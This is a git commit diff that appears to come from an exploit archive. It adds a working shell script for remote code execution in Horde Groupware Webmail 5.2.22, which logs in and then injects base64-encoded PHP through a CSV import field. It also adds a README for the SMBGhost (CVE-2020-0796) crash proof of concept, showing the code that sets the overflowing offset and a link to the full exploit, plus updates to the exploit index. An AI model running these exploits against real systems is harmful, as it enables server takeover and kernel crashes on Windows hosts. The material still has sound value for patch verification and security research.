DB: 2020-03-15

2 changes to exploits/shellcodes Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC) Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution
2020-03-15 05:01:47 +00:00 · 2020-03-15 05:01:47 +00:00 · 9bacc6784a
commit 9bacc6784a
parent 79fee2e601
3 changed files with 72 additions and 0 deletions
--- a/exploits/php/webapps/48215.sh
+++ b/exploits/php/webapps/48215.sh
@ -0,0 +1,41 @@
 #!/bin/sh
 if [ "$#" -ne 4 ]; then
    echo '[!] Usage: <url> <username> <password> <command>' 1>&2
    exit 1
 fi
 BASE="$1"
 USERNAME="$2"
 PASSWORD="$3"
 COMMAND="$4"
 JAR="$(mktemp)"
 trap 'rm -f "$JAR"' EXIT
 echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
 curl -si -c "$JAR" "$BASE/login.php" \
    -d 'login_post=1' \
    -d "horde_user=$USERNAME" \
    -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
    echo '[!] Cannot log in' 1>&2
 echo "[+] Uploading dummy file" 1>&2
 echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
    -F 'actionID=11' \
    -F 'import_step=1' \
    -F 'import_format=csv' \
    -F 'notepad_target=x' \
    -F 'import_file=@-;filename=x' \
    -so /dev/null
 echo "[+] Running command" 1>&2
 BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
 curl -b "$JAR" "$BASE/mnemo/data.php" \
    -d 'actionID=3' \
    -d 'import_step=2' \
    -d 'import_format=csv' \
    -d 'header=1' \
    -d 'fields=1' \
    -d 'sep=x' \
    --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"
--- a/exploits/windows/dos/48216.md
+++ b/exploits/windows/dos/48216.md
@ -0,0 +1,29 @@
 # CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost
 Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip
 ## Usage
 `./CVE-2020-0796.py servername`
 This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.
 This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.
 The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.
 ```python
    def _compress(self, b_data, session):
        header = SMB2CompressionTransformHeader()
        header['original_size'] = len(b_data)
        header['offset'] = 4294967295
        header['data'] = smbprotocol.lznt1.compress(b_data)
 ```
 ## About
 CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).
 Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.
 CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6685,6 +6685,7 @@ id,file,description,date,author,type,platform,port
 48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
 48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 48137,exploits/windows/dos/48137.py,"Core FTP LE 2.2 - Denial of Service (PoC)",2020-02-26,"Ismael Nava",dos,windows,
 48216,exploits/windows/dos/48216.md,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)",2020-03-14,eerykitty,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42469,3 +42470,4 @@ id,file,description,date,author,type,platform,port
 48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
 48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
 48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
 48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,